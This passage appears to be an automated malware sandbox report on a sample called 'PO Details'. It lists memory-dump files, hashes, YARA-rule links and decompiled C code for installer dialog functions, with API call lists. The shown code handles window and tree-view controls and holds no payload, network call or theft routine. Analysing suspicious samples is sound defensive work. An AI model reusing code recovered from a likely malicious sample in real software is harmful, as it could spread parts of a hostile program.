Instruction ID: 4c948e8094d30857df7bb037d19ad889c7f26ef399dade94ff28b4422ea0219f
Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
Instruction Fuzzy Hash: A4C15931E042199BCF14CF68D8905EEBBB2BF88354F25866AD85677380D738B942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 02A81554 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feda178a8fea274bbd42b805e8b8c6d174fe0bfece2e7208fc8a3bc1aaa645f5
Instruction ID: 2b3293d91ba3972b4566a0bdab7063b8b19e6eb30d209f31808231b1925484b8
Opcode Fuzzy Hash: feda178a8fea274bbd42b805e8b8c6d174fe0bfece2e7208fc8a3bc1aaa645f5
Instruction Fuzzy Hash: 1B61AD67E2E315C9EB933170C6403F2A9A1DF23C92D618B67983B719617F1B4A8F84C5

Uniqueness

Uniqueness Score: -1.00%

Function 02A832C4 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8383f929fe891ad15a7ed1e6a7d892bba2fda4c4e5470864ea14f92a473363
Instruction ID: 4053ed778360b7f02c2b19da5fc243ca1d790b35a95755491c7890a41761eb21
Opcode Fuzzy Hash: fd8383f929fe891ad15a7ed1e6a7d892bba2fda4c4e5470864ea14f92a473363
Instruction Fuzzy Hash: 95515E746403068FDF589F3585F43D763E3AF96284F59826FDC568B294EB358886CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02A8AB04 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8989462b57e0210b60c9d70e43f7a3415d578bd08392d6013ba7f945d70788d7
Instruction ID: 805d734f1273e90f2ac2e2d651d7b287212fb5e4ee84001bfc7baa7e644fcf50
Opcode Fuzzy Hash: 8989462b57e0210b60c9d70e43f7a3415d578bd08392d6013ba7f945d70788d7
Instruction Fuzzy Hash: 32510572900754DFDF34DF298AA93E677E2AF98241F49852F8D8E8B601EB346941CB05

Uniqueness

Uniqueness Score: -1.00%

Function 02A900C6 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a80000_PO Details.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81827bcceb1b195d0128135311d106619fcd240a3b44f93ef4495518d8d2b706
Instruction ID: c3b10098dbc2188623b496aa8057175400ebd736d64ed67ae539a3ce6f8ac821
Opcode Fuzzy Hash: 81827bcceb1b195d0128135311d106619fcd240a3b44f93ef4495518d8d2b706
Instruction Fuzzy Hash: 0EB09230610540CFDB81CA08C180F8073A0BB00B00F814480E0018BB51C228E900CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD4 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 490
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404DD4(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				int _v32;
				void* _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t191;
				signed int _t203;
				void* _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t249;
				signed int _t251;
				signed char _t252;
				signed char _t260;
				void* _t265;
				void* _t267;
				signed char* _t285;
				signed char _t286;
				long _t291;
				void* _t298;
				signed int* _t299;
				int _t300;
				long _t301;
				int _t303;
				long _t304;
				int _t305;
				signed int _t306;
				signed int _t309;
				signed int _t316;
				signed char* _t324;
				int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t191 = GetDlgItem(_a4, 0x408);
				_t298 =  *0x434f48;
				_t331 = SendMessageW;
				_v8 = _t191;
				_v36 = _t298;
				_v24 =  *0x434f14 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t307 = _a16;
					} else {
						_a12 = 0;
						_t307 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t307;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t307 + 4)) == 0x408) {
							if(( *0x434f1d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe39) {
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x818 + _t298 + 8) =  *(_t244 * 0x818 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t307 = 0 | _a8 != 0x00000413;
								_t249 = E00404D22(_v8, _a8 != 0x413);
								_v20 = _t249;
								if(_t249 >= 0) {
									_t100 = _t298 + 8; // 0x8
									_t307 = _t249 * 0x818 + _t100;
									_t251 =  *_t307;
									if((_t251 & 0x00000010) == 0) {
										if((_t251 & 0x00000040) == 0) {
											_t252 = _t251 ^ 0x00000001;
										} else {
											_t260 = _t251 ^ 0x00000080;
											if(_t260 >= 0) {
												_t252 = _t260 & 0x000000fe;
											} else {
												_t252 = _t260 | 0x00000001;
											}
										}
										 *_t307 = _t252;
										E0040117D(_v20);
										_a8 = 0x40f;
										_a12 = _v20 + 1;
										_a16 =  !( *0x434f1c) >> 0x00000008 & 0x00000001;
									}
								}
								goto L41;
							}
							_t307 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42d24c;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42d260;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f80 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f1d & 0x00000001) != 0) {
									_t329 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t329);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t329);
								}
								goto L93;
							} else {
								E004011EF(_t307, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404DA2();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t307, 0, 0);
									_v36 =  *0x42d260;
									_t206 =  *0x434f48;
									_v64 = 0xf030;
									_v20 = 0;
									if( *0x434f4c <= 0) {
										L86:
										if( *0x434f0c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x433edc; // 0x7b357c
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404CDD(0x3ff, 0xfffffffb, E00404CF5(5));
										}
										goto L90;
									}
									_t299 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v20 * 4));
										if(_t212 != 0) {
											_t309 =  *_t299;
											_v72 = _t212;
											_v76 = 8;
											if((_t309 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t299[4]);
												_t299[0] = _t299[0] & 0x000000fe;
											}
											if((_t309 & 0x00000040) == 0) {
												_t216 = (_t309 & 0x00000001) + 1;
												if((_t309 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t309 & 0x00000008) + (_t216 << 0x0000000b | _t309 & 0x00000008) | _t309 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t309 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v20 = _v20 + 1;
										_t299 =  &(_t299[0x206]);
									} while (_v20 <  *0x434f4c);
									goto L86;
								} else {
									_t300 = E004012E2( *0x42d260);
									E00401299(_t300);
									_t227 = 0;
									_t307 = 0;
									if(_t300 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t307, 0);
										_a16 = _t300;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t227 * 4)) != 0) {
											_t307 = _t307 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t300);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t301 = SendMessageW(_v12, 0x150, _t237, 0);
							if(_t301 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t301 * 4)) == 0) {
								_t301 = 0x20;
							}
							E00401299(_t301);
							SendMessageW(_a4, 0x420, 0, _t301);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x434f80 = _a4;
					_t303 = 2;
					_v32 = 0;
					_v20 = _t303;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f4c << 2);
					_t265 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_v16 = _t265;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E004053ED);
					_t267 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t267;
					ImageList_AddMasked(_t267, _v16, 0xff00ff);
					SendMessageW(_v8, 0x1109, _t303,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v16);
					_t304 = 0;
					do {
						_t273 =  *((intOrPtr*)(_v24 + _t304 * 4));
						if( *((intOrPtr*)(_v24 + _t304 * 4)) != 0) {
							if(_t304 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040644E(_t304, 0, _t331, 0, _t273)), _t304);
						}
						_t304 = _t304 + 1;
					} while (_t304 < 0x21);
					_t305 = _a16;
					_push( *((intOrPtr*)(_t305 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404367(_a4);
					_push( *((intOrPtr*)(_t305 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404367(_a4);
					_t306 = 0;
					_v16 = 0;
					if( *0x434f4c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t324 = _v36 + 8;
						_v28 = _t324;
						do {
							_t285 =  &(_t324[0x10]);
							if( *_t285 != 0) {
								_v64 = _t285;
								_t286 =  *_t324;
								_v88 = _v16;
								_t316 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t316;
								_v44 = _t306;
								_v72 = _t286 & _t316;
								if((_t286 & 0x00000002) == 0) {
									if((_t286 & 0x00000004) == 0) {
										 *( *0x42d260 + _t306 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t291 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v32 = 1;
									 *( *0x42d260 + _t306 * 4) = _t291;
									_v16 =  *( *0x42d260 + _t306 * 4);
								}
							}
							_t306 = _t306 + 1;
							_t324 =  &(_v28[0x818]);
							_v28 = _t324;
						} while (_t306 <  *0x434f4c);
						if(_v32 != 0) {
							L20:
							if(_v20 != 0) {
								E0040439C(_v8);
								_t298 = _v36;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040439C(_v12);
								L93:
								return E004043CE(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404df2
0x00404df8
0x00404dfa
0x00404e00
0x00404e06
0x00404e1c
0x00404e1f
0x00404e22
0x00405055
0x0040505c
0x00405070
0x0040505e
0x00405060
0x00405063
0x00405064
0x0040506b
0x0040506b
0x0040507c
0x0040508a
0x0040508d
0x004050a3
0x0040511b
0x0040511e
0x00405120
0x0040512a
0x00405138
0x00405138
0x0040513a
0x00405144
0x0040514a
0x0040514d
0x00405168
0x0040514f
0x00405159
0x00405159
0x0040514d
0x00405144
0x00000000
0x0040511e
0x004050a8
0x004050b3
0x004050b8
0x004050bf
0x004050c6
0x004050c9
0x004050d1
0x004050d1
0x004050d5
0x004050d9
0x004050dd
0x004050f0
0x004050df
0x004050df
0x004050e6
0x004050ec
0x004050e8
0x004050e8
0x004050e8
0x004050e6
0x004050f6
0x004050f8
0x00405100
0x00405108
0x00405118
0x00405118
0x004050d9
0x00000000
0x004050c9
0x004050aa
0x004050b1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040516b
0x0040516b
0x00405172
0x004051e3
0x004051ea
0x004051f6
0x004051f6
0x004051ff
0x00405201
0x00405208
0x0040520b
0x0040520b
0x00405211
0x00405218
0x0040521b
0x0040521b
0x00405221
0x00405227
0x0040522d
0x0040522d
0x0040523a
0x0040539a
0x004053a1
0x004053be
0x004053c4
0x004053d6
0x004053d6
0x00000000
0x00405240
0x00405242
0x00405247
0x0040524c
0x00405251
0x00405253
0x00405253
0x00405254
0x00405255
0x00405257
0x00405257
0x0040525f
0x004052a0
0x004052a2
0x004052b2
0x004052b5
0x004052ba
0x004052c1
0x004052c4
0x00405366
0x0040536e
0x00405376
0x00405376
0x0040537c
0x00405384
0x00405395
0x00405395
0x00000000
0x00405384
0x004052ca
0x004052cd
0x004052d3
0x004052d8
0x004052da
0x004052dc
0x004052e2
0x004052e9
0x004052ee
0x004052f5
0x004052f8
0x004052f8
0x004052ff
0x0040530b
0x0040530f
0x00405311
0x00405311
0x00405301
0x00405303
0x00405303
0x00405331
0x0040533d
0x0040534c
0x0040534c
0x0040534e
0x00405351
0x0040535a
0x00000000
0x00405261
0x0040526c
0x0040526f
0x00405274
0x00405276
0x0040527a
0x0040528a
0x00405294
0x00405296
0x00405299
0x00000000
0x00000000
0x00000000
0x00000000
0x0040527c
0x0040527c
0x00405282
0x00405284
0x00405284
0x00405285
0x00405286
0x00000000
0x0040527c
0x0040525f
0x0040523a
0x0040517a
0x00000000
0x00405190
0x0040519a
0x0040519f
0x00000000
0x00000000
0x004051b1
0x004051b6
0x004051c2
0x004051c2
0x004051c4
0x004051d3
0x004051d5
0x004051d9
0x004051dc
0x00000000
0x004051dc
0x0040517a
0x00404e28
0x00404e2d
0x00404e37
0x00404e38
0x00404e41
0x00404e50
0x00404e5b
0x00404e61
0x00404e6f
0x00404e84
0x00404e89
0x00404e94
0x00404e9d
0x00404eb2
0x00404ec3
0x00404ed0
0x00404ed0
0x00404ed5
0x00404edb
0x00404edd
0x00404ee0
0x00404ee5
0x00404eea
0x00404eec
0x00404eec
0x00404f0c
0x00404f0c
0x00404f0e
0x00404f0f
0x00404f14
0x00404f1a
0x00404f1e
0x00404f23
0x00404f2b
0x00404f2f
0x00404f34
0x00404f39
0x00404f41
0x00404f44
0x00405014
0x00405027
0x00000000
0x00404f4a
0x00404f4d
0x00404f50
0x00404f53
0x00404f53
0x00404f59
0x00404f62
0x00404f65
0x00404f69
0x00404f6c
0x00404f6f
0x00404f78
0x00404f81
0x00404f84
0x00404f87
0x00404f8a
0x00404fc8
0x00404ff3
0x00404fca
0x00404fd9
0x00404fd9
0x00404f8c
0x00404f8f
0x00404f9d
0x00404fa7
0x00404faf
0x00404fb6
0x00404fc1
0x00404fc1
0x00404f8a
0x00404ff9
0x00404ffa
0x00405006
0x00405006
0x00405012
0x0040502d
0x00405030
0x0040504d
0x00405052
0x00000000
0x00405032
0x00405037
0x00405040
0x004053d8
0x004053ea
0x004053ea
0x00405030
0x00000000
0x00405012
0x00404f44

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DEB
GetDlgItem.USER32(?,00000408), ref: 00404DF8
GlobalAlloc.KERNEL32(00000040,?), ref: 00404E44
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E5B
SetWindowLongW.USER32(?,000000FC,004053ED), ref: 00404E75
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E89
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E9D
SendMessageW.USER32(?,00001109,00000002), ref: 00404EB2
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EBE
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404ED0
DeleteObject.GDI32(00000110), ref: 00404ED5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404F00
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404F0C
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FA7
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FD7

Part of subcall function 0040439C: SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA

SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FEB
GetWindowLongW.USER32(?,000000F0), ref: 00405019
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405027
ShowWindow.USER32(?,00000005), ref: 00405037
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405138
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040519A
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004051AF
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051D3
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051F6
ImageList_Destroy.COMCTL32(?), ref: 0040520B
GlobalFree.KERNEL32(?), ref: 0040521B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405294
SendMessageW.USER32(?,00001102,?,?), ref: 0040533D
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040534C
InvalidateRect.USER32(?,00000000,00000001), ref: 00405376
ShowWindow.USER32(?,00000000), ref: 004053C4
GetDlgItem.USER32(?,000003FE), ref: 004053CF
ShowWindow.USER32(00000000), ref: 004053D6

Strings

M, xrefs: 00404F8F
N, xrefs: 00405073
, xrefs: 004053AE
|5{, xrefs: 0040537C

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N$|5{
API String ID: 2564846305-1354468431
Opcode ID: 7b7957ea1338d254e874131d8d2f31ce821a0993c9efe37939129592d3677914
Instruction ID: d580a4fcaa5169941c29ca465f5867fc490570c71858173d192e260bc12e7e27
Opcode Fuzzy Hash: 7b7957ea1338d254e874131d8d2f31ce821a0993c9efe37939129592d3677914
Instruction Fuzzy Hash: 9C127A70D00609EFDB20DFA5CD45AAEBBB5FB84314F10817AEA10BA2E1C7798941DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404526 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404526(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004043CE(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E004047D5(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t69 =  *0x42c240; // 0x7acc34
						_t29 = _t69 + 0x14; // 0x7acc48
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404389(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004047B1();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t111 =  *0x433edc; // 0x7b357c
					_t75 =  *(_t111 - 4 + _t75 * 4);
				}
				_t76 =  *0x434f58 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E004044D7;
				if(_t110 != 2) {
					_v8 = E0040449D;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404367(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404367(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404389( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E0040439C(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f14 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}

0x00404538
0x00404665
0x004046c2
0x004046c6
0x00404793
0x00404795
0x00404795
0x0040479b
0x0040479b
0x0040479e
0x00000000
0x004047a5
0x004046d4
0x004046da
0x004046e4
0x004046ef
0x004046f2
0x004046f5
0x00404700
0x00404703
0x0040470a
0x00404717
0x00404728
0x0040472e
0x00404736
0x00404744
0x0040474a
0x0040474a
0x0040470a
0x00404754
0x00000000
0x0040475f
0x00404763
0x00404773
0x00404773
0x00404779
0x00404785
0x00404785
0x00000000
0x00404789
0x00404754
0x00404670
0x00000000
0x00404682
0x00404682
0x00404687
0x00404687
0x0040468d
0x00000000
0x00000000
0x004046b6
0x004046b8
0x004046bd
0x00000000
0x004046bd
0x00404670
0x0040453e
0x00404541
0x00404546
0x00404548
0x00404557
0x00404557
0x0040455f
0x00404562
0x00404566
0x00404569
0x0040456d
0x00404570
0x00404573
0x00404576
0x0040457d
0x0040457f
0x0040457f
0x00404589
0x00404596
0x004045a0
0x004045a5
0x004045a8
0x004045ad
0x004045c4
0x004045cb
0x004045de
0x004045e1
0x004045f5
0x004045fc
0x00404601
0x00404606
0x00404606
0x00404614
0x00404622
0x00404634
0x00404639
0x00404649
0x0040464b
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045C4
GetDlgItem.USER32(?,000003E8), ref: 004045D8
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045F5
GetSysColor.USER32(?), ref: 00404606
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404614
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404622
lstrlenW.KERNEL32(?), ref: 00404627
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404634
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404649
GetDlgItem.USER32(?,0000040A), ref: 004046A2
SendMessageW.USER32(00000000), ref: 004046A9
GetDlgItem.USER32(?,000003E8), ref: 004046D4
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404717
LoadCursorW.USER32(00000000,00007F02), ref: 00404725
SetCursor.USER32(00000000), ref: 00404728
LoadCursorW.USER32(00000000,00007F00), ref: 00404741
SetCursor.USER32(00000000), ref: 00404744
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404773
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404785

Strings

Call, xrefs: 00404703
N, xrefs: 004046C2
|5{, xrefs: 00404548

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N$|5{
API String ID: 3103080414-2062462976
Opcode ID: 3e7f1d81aaa2c81caad56aadef940d4d94f2f382e64dbbb27fd2036abddb4608
Instruction ID: bc177dfd6b6b6103f733ab6784bbaef7ca361af311f51bfa08924dfc74b84e38
Opcode Fuzzy Hash: 3e7f1d81aaa2c81caad56aadef940d4d94f2f382e64dbbb27fd2036abddb4608
